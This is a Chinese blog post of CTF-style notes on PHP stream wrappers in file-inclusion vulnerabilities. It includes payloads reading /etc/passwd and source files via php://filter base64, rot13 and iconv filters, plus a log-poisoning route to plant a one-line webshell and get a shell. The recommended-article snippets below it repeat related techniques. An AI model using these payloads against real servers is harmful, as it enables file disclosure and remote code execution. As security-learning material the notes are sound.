php文件包含协议

已于 2022-12-08 11:56:02 修改
阅读量390 收藏 1
点赞数
文章标签: php
于 2022-10-06 22:46:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65283068/article/details/127189113
版权

1.PHP伪协议配合文件包含不仅可以进行php任意代码执行而且可以读取任意文件

file://协议,需要填写绝对路径只能读取txt文件。后面直接跟绝对路径即可。

 示例:file:///etc/passwd

2.php://filter

(1)String Filters(字符串过滤器)

php://filter/string.rot13/resource=flag.php //读出以后利用ROT13解码即可

php://filter/string.toupper/resource=flag.php //转大写

php://filter/string.tolower/resource=flag.php //转小写

php://filter/string.strip_tags/resource=flag.php //php标签里所有东西都会被去除,html只有标签会被去除,里面的文字不会删除

(2)Conversion Filters(转换过滤器)

php://filter/convert.base64-encode/resource=flag.php //base64加密读出

php://filter/convert.quoted-printable-encode/resource=flag.php //在后面加了个=0A,其他含义我不也清楚啊

convert.iconv.*:

用法:

convert.iconv.<input-encoding>.<output-encoding>
or
convert.iconv.<input-encoding>/<output-encoding>

<input-encoding>和<output-encoding> 就是编码方式,有如下几种:

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*

示例payload:?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=/var/www/html/flag.php

3.包含日志文件,抓包写入一句话木马,进行getshell 日志文件路径:

(1)/var/log/nginx/access.log

(2)/var/log/apache2/access_log

乌鸦坐飞机_L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 file_include 解题详析(php协议+convert转换过滤器)
等风来
07-31 4700
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
文件包含中的伪协议
weixin_51693574的博客
12-23 1850
文件包含中的伪协议 1.利用前提 1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问; 3.在使用文件包含漏洞时,必须要能知道其绝对路径(在包含文件处,查看其返回的错误的信息) 2.伪协议文件包含(伪协议后必须是文件绝对路径) 1.file:// 访问本地文件系统 2.http:// 访问 HTTPs 网址 3.ftp:// 访问 ftp URL 4.php://
php文件包含协议
m0_64361111的博客
02-28 1042
PHP有很多内置 URL风格的封装协议,这类协议与fopen()、 copy()、 file_exists()和filesize()的文件系统函数所提供的功能类似。 zip:// 伪协议 先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传 在网站根目录创建1.txt,内容为 压缩,压缩后在浏览器访问 php://input ..
文件包含时涉及PHP协议总结
最新发布
qq_43256965的博客
05-14 1071
在做CTF题的时候文件包含题出现多次使用伪协议,学习了下伪协议就顺便写个博客防止以后忘记PHP协议总结温故而知新,宁静以致远。
文件包含支持的伪协议
qq_50673174的博客
05-15 7763
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议
http协议文件上传
07-13
在数据访问层,可能需要将文件的一些元数据(如文件名、大小、上传时间等)存储到数据库中,以便于后续的查询和管理。可以使用JDBC直接操作数据库,或者使用ORM框架如Hibernate或MyBatis来简化数据库操作。 具体...
Java实现基于http协议的网络文件下载
08-10
HTTP响应状态行包括:HTTP状态码和一些HTTP响应标题。 HTTP回应报文: HTTP Version: HTTP/1.1 //服务器用的是HTTP/1.1版本 HTTP Status: 200 //请求成功,信息可以读取,包含在响应的报文中 Date: //响应报文的...
200多个不同协议抓包文件 集合汇总
05-14
接下来,我们将讨论一些常见的网络协议及其在抓包文件中的表现: 1. TCP(传输控制协议):TCP是一种面向连接的、可靠的传输协议,它确保数据的有序、无损传输。在抓包文件中,你可以看到TCP三次握手和四次挥手过程...
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要包含的文件路径时,如果这种输入没有经过充分验证,攻击者就能利用此漏洞执行任意代码。 首先,我们需要了解PHP的配置选项。`allow_url_include`和`allow...
GetHttpFile1.rar_HTTP协议_HTTP远程文件_http 文件_远程
09-21
"GetHttpFile1.rar"这个压缩包可能包含了一个程序或示例,用于演示如何通过HTTP协议从远程服务器下载文件。在描述中提到的“很不错哦”,暗示这个工具或代码可能易于使用且功能实用。 首先,让我们深入了解一下HTTP...
这里我们学习一下文件包含php协议
qq_51802152的博客
12-24 159
文件包含的含义
文件包含漏洞相关协议详解
永远是少年
12-13 2427
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
文件包含协议总结备忘录
告白的博客
01-16 2072
0x00 文件包含漏洞 漏洞参数原因:源码采用include危险函数,传入对象参数由用户输入控制,可访问上传的包含文件页面 漏洞利用前提:知道包含文件解析的绝对路径,可访问绝对路径页面 常见的为协议分类: file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// 访问 ftp URL Php:// 访问输入输出流 Zlib:// 压缩流 Data:// 数据 Ssh2:// security shell2 Expect:// 处理交互式的流 Glob://
ctf文件包含+伪协议总结
limenzzz的博客
09-08 2297
基本原理
攻防世界 Web_php_include(文件包含,伪协议读取,命令执行)
m0_74119193的博客
05-11 237
第一句中的 show_source() 函数是 highlight_flie()的别称,第二句是get传参给hello,在这里可以构造payload :?hello=1 然后看到strstr()函数,它是区分大小写的,在本题代码中传给page的参数中包含php://时会自动过滤,且不能使用Php://的大小写绕过,但是可以尝试用大写绕过PHP://
语言_php_协议
redglare的博客
10-21 385
php协议
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2671
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
文件包含和伪协议
qq_60905276的博客
10-11 512
如果url出现有?file=XXX.php等是典型的文件包含 如下 文件包含可以使用PHP协议php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 php://fileter 可以读取目标文件的内容,由于读取时,一些代码不能显示,通常使用Base64加密后读取再解密。 文件包含知识点 一、原理: 在开发过程中,当频繁需要跳转网页,或者需要某个函数...
php filter协议包含php文件
03-31
PHP Filter协议是一种用于在PHP中对输入数据...但是,PHP Filter协议并不包含PHP文件,因为它主要用于数据过滤和验证,而不是处理PHP代码。如果需要执行PHP代码,可以使用其他方法,例如包含PHP文件或使用eval函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值